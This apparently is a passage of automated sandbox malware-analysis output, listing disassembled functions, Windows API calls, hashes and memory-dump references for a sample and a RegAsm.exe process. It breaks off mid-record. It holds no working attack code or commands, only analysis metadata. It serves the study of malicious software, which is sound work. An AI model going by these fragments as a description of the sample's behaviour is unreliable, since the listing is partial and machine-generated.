Opcode ID: 2f7e74d9e858c41298eae74ce55755b9141183cc78dbf184b5aafda2db7cc98f
Instruction ID: 147b2729223412b71d008e40204dbd671b09dffa15e9531bc4613b5a32735565
Opcode Fuzzy Hash: 2f7e74d9e858c41298eae74ce55755b9141183cc78dbf184b5aafda2db7cc98f
Instruction Fuzzy Hash: 4D415E71900A8ADBCB22CF66C580A6AB7F8FF693A0B104A2DD666D7740D730FD45CB51

Function 009E6704 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 009E670B
std::_Lockit::_Lockit.LIBCPMT ref: 009E6716
std::_Lockit::~_Lockit.LIBCPMT ref: 009E6784

Part of subcall function 009E6867: std::locale::_Locimp::_Locimp.LIBCPMT ref: 009E687F

std::locale::_Setgloballocale.LIBCPMT ref: 009E6731
_Yarn.LIBCPMT ref: 009E6747

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 514bc8e5a3c026f496120f6154992ca41b6ec4866337e3471a6dbc35172be85f
Instruction ID: cbfe2e440204b34603c629a352ef22a1409c27626d933b90e3551a9770b527ec
Opcode Fuzzy Hash: 514bc8e5a3c026f496120f6154992ca41b6ec4866337e3471a6dbc35172be85f
Instruction Fuzzy Hash: 0701BC75A006A49FC706EB61D88567C7B71BFD4785B144119E802573D1CF34AE03CBC2

Function 009EE142 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,009EE0F3,?,?,00000000,?,?,?,009EE21D,00000002,FlsGetValue,00A091A0,FlsGetValue), ref: 009EE14F
GetLastError.KERNEL32(?,009EE0F3,?,?,00000000,?,?,?,009EE21D,00000002,FlsGetValue,00A091A0,FlsGetValue,?,?,009ED06B), ref: 009EE159
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 009EE181

Strings

api-ms-, xrefs: 009EE166

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 7ad942ed1517d672b1a4a93e95601df74e21b1c0f836a14ad4632b9cc03d6058
Instruction ID: c4279683879f65bbe00ff22aef079bb5b87d4851f222197acfd6aa7af838b2b2
Opcode Fuzzy Hash: 7ad942ed1517d672b1a4a93e95601df74e21b1c0f836a14ad4632b9cc03d6058
Instruction Fuzzy Hash: D5E0B87164834DFBEF115FA1EC06F5E3E59AB01B50F108520FA4DA40E1D771ED5295A4

Function 009FA3EB Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(E6A741B3,00000000,00000000,?), ref: 009FA44E

Part of subcall function 009FCF82: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,009F9FC7,?,00000000,-00000008), ref: 009FD02E

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 009FA6A9
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 009FA6F1
GetLastError.KERNEL32 ref: 009FA794

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: ce0561ae086c7e7b7d5efec1a060266e9d62820dfe6217c78ea7ee2af03fe5ab
Instruction ID: ccd21aa115c5b71d5e0cfff651c98ba8e15ccb30e6ab40e51a401d2b915a6da0
Opcode Fuzzy Hash: ce0561ae086c7e7b7d5efec1a060266e9d62820dfe6217c78ea7ee2af03fe5ab
Instruction Fuzzy Hash: 24D16AB5D002489FCF15CFA8D880AEDBBB5FF48314F18852AE95AE7251D730A942CF51

Function 009ED161 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 009ED228
___AdjustPointer.LIBCMT ref: 009ED24B
___AdjustPointer.LIBCMT ref: 009ED2E7

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: fb102e064e9673d7c0810a2edb9aa0e85dbd30c10a5c2f123f3ffb4dde2e9a5d
Instruction ID: 528f7f8cc85fab1a78a730e57e1ab72dba859ab3318f2bb1b6dc0d6873770c50
Opcode Fuzzy Hash: fb102e064e9673d7c0810a2edb9aa0e85dbd30c10a5c2f123f3ffb4dde2e9a5d
Instruction Fuzzy Hash: FD51F5B2A06386AFDB2B8F52C841B7A73A8FF84710F14452DE92557391E731ED40C790

Function 009FD39E Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 009FCF82: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,009F9FC7,?,00000000,-00000008), ref: 009FD02E

GetLastError.KERNEL32 ref: 009FD402
__dosmaperr.LIBCMT ref: 009FD409
GetLastError.KERNEL32(?,?,?,?), ref: 009FD443
__dosmaperr.LIBCMT ref: 009FD44A

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 6e770004dc5fa61906e9f6b957138b65b4b0285454c8dece6d85a8e07be3c5cb
Instruction ID: 11c290951f4f453e1cea4c2d9a5c1b9c2f36d647c0d101e23b3c52a9570a6509
Opcode Fuzzy Hash: 6e770004dc5fa61906e9f6b957138b65b4b0285454c8dece6d85a8e07be3c5cb
Instruction Fuzzy Hash: 9721D47160620DEFDB20AF65CC80A7BB7AEEF843687108519FB1997191E734FC0097A1

Function 009F3DD6 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d7b1a713fefedfb398651efd5013dbca8ae7165560ecf41dd7ce040e7e2f90d
Instruction ID: ecc234aa1d2c8625240177572b2f51f8d7781536a592556297492cb2e7d779f9
Opcode Fuzzy Hash: 9d7b1a713fefedfb398651efd5013dbca8ae7165560ecf41dd7ce040e7e2f90d
Instruction Fuzzy Hash: EF21AE7160120DAFDB20EF74DC85A7FB7ADAF90364710C924FA1997150E738EE108BA0

Function 009FE334 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 009FE33C

Part of subcall function 009FCF82: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,009F9FC7,?,00000000,-00000008), ref: 009FD02E

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009FE374
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009FE394

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 6691d9d93583339dda8ea3b2de9ce15257a175d44de05e0994e9d703f340bb7f
Instruction ID: 350e77a8ccca7526ff1b838e64ceb05c6d7935c0b59533709bf9f697a0838d0c
Opcode Fuzzy Hash: 6691d9d93583339dda8ea3b2de9ce15257a175d44de05e0994e9d703f340bb7f
Instruction Fuzzy Hash: 0B11C4F190561DBEAB1567B66C8DDBF6AADCEC53A43100524FA01D2160FAB4DD028370

Function 009E1FD1 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 009E1FDD
int.LIBCPMT ref: 009E1FF0

Part of subcall function 009E2D36: std::_Lockit::_Lockit.LIBCPMT ref: 009E2D47
Part of subcall function 009E2D36: std::_Lockit::~_Lockit.LIBCPMT ref: 009E2D61

std::_Facet_Register.LIBCPMT ref: 009E2023
std::_Lockit::~_Lockit.LIBCPMT ref: 009E2039

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 62712a2762111e1069529412a4d59520022e2259c8f8064077ade9497601c036
Instruction ID: c64060309e0e4a4a3fd29bd0e4706f8f78039b414c44f5a60cb614b8b2088d51
Opcode Fuzzy Hash: 62712a2762111e1069529412a4d59520022e2259c8f8064077ade9497601c036
Instruction Fuzzy Hash: 5501A772900154ABCB16EBA6D805A9E776CEFC0761B214558F901AB2D1EF309E41C7D4

Function 009E1F58 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 009E1F64
int.LIBCPMT ref: 009E1F77

Part of subcall function 009E2D36: std::_Lockit::_Lockit.LIBCPMT ref: 009E2D47
Part of subcall function 009E2D36: std::_Lockit::~_Lockit.LIBCPMT ref: 009E2D61

std::_Facet_Register.LIBCPMT ref: 009E1FAA
std::_Lockit::~_Lockit.LIBCPMT ref: 009E1FC0

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 7b6005bd64d0bef2c4df5da4fe98ec103a68a732cbb63bf8003afdbcf3853e6e
Instruction ID: 7265e4229a20ce849959632dc66b799829fdc2cc050a6e500cc8e6351d2b3de7
Opcode Fuzzy Hash: 7b6005bd64d0bef2c4df5da4fe98ec103a68a732cbb63bf8003afdbcf3853e6e
Instruction Fuzzy Hash: 4601F732900554AFCB16AB96D805E9D77BCEF80764B210664F901AB290EF309F4287D1

Function 00A0460F Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00A02F54,00000000,00000001,00000000,?,?,009FA7E8,?,00000000,00000000), ref: 00A04626
GetLastError.KERNEL32(?,00A02F54,00000000,00000001,00000000,?,?,009FA7E8,?,00000000,00000000,?,?,?,009FAD6F,00000000), ref: 00A04632

Part of subcall function 00A045F8: CloseHandle.KERNEL32(FFFFFFFE,00A04642,?,00A02F54,00000000,00000001,00000000,?,?,009FA7E8,?,00000000,00000000,?,?), ref: 00A04608

___initconout.LIBCMT ref: 00A04642

Part of subcall function 00A045BA: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00A045E9,00A02F41,?,?,009FA7E8,?,00000000,00000000,?), ref: 00A045CD

WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00A02F54,00000000,00000001,00000000,?,?,009FA7E8,?,00000000,00000000,?), ref: 00A04657

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: f8eb94eb94d53a8e1d5f4137262737677b9678a26da30b5b9b0802b7c98cb642
Instruction ID: a139095f2726f945bca0a3f3aceb5fc7fb71b1304a13e58d936623d5471b8c8d
Opcode Fuzzy Hash: f8eb94eb94d53a8e1d5f4137262737677b9678a26da30b5b9b0802b7c98cb642
Instruction Fuzzy Hash: 57F01C7680525CBBCF26AFD5EC0498E3F66FB0A3A1F004510FF2885170D632AD21ABA0

Function 009ECE50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 009ECE8F
__IsNonwritableInCurrentImage.LIBCMT ref: 009ECF43

Strings

csm, xrefs: 009ECF2D

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 4b7341c39233d9a8c21388602b1fde0e06c8f4d656fa8bb2e4e177419f403c34
Instruction ID: 501c019d516231f724a7f221ff5e8adedf8ab25dc272c242309440a9de0c24b6
Opcode Fuzzy Hash: 4b7341c39233d9a8c21388602b1fde0e06c8f4d656fa8bb2e4e177419f403c34
Instruction Fuzzy Hash: 7B41C774A00288AFCF11DF69C885A9E7BB5FF48314F148559EC555B392D7319E12CB90

Function 009ED75D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 009ED782

Strings

RCC, xrefs: 009ED79C
MOC, xrefs: 009ED794

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: a61659c00f09792b1d6003db7b9219ac28ea417a937f875342645f9c5d6a5d36
Instruction ID: b0c05b9f4e5ab2614439b2d025d7ce39fb0c8a188c461733b1016c445573af05
Opcode Fuzzy Hash: a61659c00f09792b1d6003db7b9219ac28ea417a937f875342645f9c5d6a5d36
Instruction Fuzzy Hash: 02418871901249EFCF16CF95CC81AAEBBB9FF48300F184169F914A7261D336AE61CB51

Function 009E6094 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 009E611C
RaiseException.KERNEL32(?,?,?,009E51D6,?,?,?,?,?,?,?,?,?,?,009E51D6,00000001), ref: 009E6141

Part of subcall function 009EB042: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00000000,?,?,009E5649,?,00A11098,009E1E57,?,009E1E57), ref: 009EB0A2

Part of subcall function 009EE6CB: IsProcessorFeaturePresent.KERNEL32(00000017,009E1E2E,?,?,?,009E3AA8,00A5F80C,?,?,009E2949,?,?,?,?,?,009E143A), ref: 009EE6E7

Strings

csm, xrefs: 009E60D0

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
String ID: csm
API String ID: 1924019822-1018135373
Opcode ID: ba71b7e75baaf5514d1022372311feaf3223d80263312d218415f42a1a92ec76
Instruction ID: a8f74d9918b1221acbe1da6032b567f5dd9850e76724273398926563af814340
Opcode Fuzzy Hash: ba71b7e75baaf5514d1022372311feaf3223d80263312d218415f42a1a92ec76
Instruction Fuzzy Hash: F521CC31D0026CABCF36DF9AD945AAEB3B8BF60750F550418E406AB252D730AD49CB81

Function 009E49CB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 009E146B: __EH_prolog3_catch.LIBCMT ref: 009E1472
Part of subcall function 009E146B: _strlen.LIBCMT ref: 009E1484

Part of subcall function 009E2241: _strlen.LIBCMT ref: 009E2259

_strlen.LIBCMT ref: 009E4A4F

Part of subcall function 009E4623: _Deallocate.LIBCONCRT ref: 009E4632

Strings

AIKSiucxhAIUsa, xrefs: 009E4A1B
IAshihcbiuY, xrefs: 009E4A00

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: _strlen$DeallocateH_prolog3_catch
String ID: AIKSiucxhAIUsa$IAshihcbiuY
API String ID: 33138215-1177490402
Opcode ID: 2510d9bcbcb73227e021e74aefda019e446a263abe33d8643e47e098c91c574f
Instruction ID: a8fbc4133f02ec4bbc716fb20f7fd1934420c85d956f0d49525e18b59e092d66
Opcode Fuzzy Hash: 2510d9bcbcb73227e021e74aefda019e446a263abe33d8643e47e098c91c574f
Instruction Fuzzy Hash: 4F11D5224087C5BAC702BF399C529AFFBE8BE99304B94095EF49553143D630FA49C7B6

Function 009E23BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 009E23C1
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 009E23F9

Part of subcall function 009E6802: _Yarn.LIBCPMT ref: 009E6821
Part of subcall function 009E6802: _Yarn.LIBCPMT ref: 009E6845

Strings

bad locale name, xrefs: 009E2407

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: db5b2fd791b941d8e1f9afac07119dda9d60113e6cda9b1b18612f65584ee242
Instruction ID: aa464acb2b0d43df171a21480ef1d647e1c7a330a3ef61167fa74c30d2e76eb1
Opcode Fuzzy Hash: db5b2fd791b941d8e1f9afac07119dda9d60113e6cda9b1b18612f65584ee242
Instruction Fuzzy Hash: AEF01771505B909E83319F6B9481947FBE4BE28310790CE6EE0DEC3A51D730A844CBAA

Analysis Process: RegAsm.exePID: 6332, Parent PID: 3608COMMON

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	145
Total number of Limit Nodes:	13

Executed Functions

Function 0285AE30 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0285B086

Memory Dump Source

Source File: 00000007.00000002.4494548379.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2850000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 562bf370923d909bbd5c6b9baa941746b1859a42f6271ec7bdbf505eabc4128f
Instruction ID: 81e8f90b1ff99d981a5fa643e27e1dc74ee85594a40a84f2435e0debf5e8845b
Opcode Fuzzy Hash: 562bf370923d909bbd5c6b9baa941746b1859a42f6271ec7bdbf505eabc4128f
Instruction Fuzzy Hash: 1E7149B8A00B158FD728DF29D58475ABBF1FF88304F008A2DD88AD7A50D779E945CB91

Function 05001CE4 Relevance: 1.6, APIs: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05001E02

Memory Dump Source

Source File: 00000007.00000002.4499798026.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5000000_RegAsm.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 5a90c8c79eb45e3448193ede6b4bea6757d78dc4112c523e98261ba75f069647
Instruction ID: d6be0a0054f5fbceec5317c61707e6d521baf843c841167f3f24787972d9db99
Opcode Fuzzy Hash: 5a90c8c79eb45e3448193ede6b4bea6757d78dc4112c523e98261ba75f069647
Instruction Fuzzy Hash: DD51DEB1C00349AFDB14CFA9D984ADEBFB1FF48310F24812AE819AB250D7759985CF90

Function 05000AA8 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05001E02

Memory Dump Source

Source File: 00000007.00000002.4499798026.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5000000_RegAsm.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: e03d00a257653b9d7e41690f37a9bba013631c962d4eebbab79fb5b60b4d1f4c
Instruction ID: a74ef82d637d2e075d53b57bb9a1095b82076cb984368192407f6d3e22c4c036
Opcode Fuzzy Hash: e03d00a257653b9d7e41690f37a9bba013631c962d4eebbab79fb5b60b4d1f4c
Instruction Fuzzy Hash: 4F51D2B1D00349AFDB14CF99D984ADEBBF5BF48310F64812AE819AB250D774A845CF90

Function 05000BFC Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05004381

Memory Dump Source

Source File: 00000007.00000002.4499798026.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5000000_RegAsm.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 8a662b782932c3f2756261d44d53de3ad741e2b946e2440458a98d249727af80
Instruction ID: 41709a09e14b2ec925cc53f972a25fdc9e5bdab859d74b47bf829d3aa7ed62b4
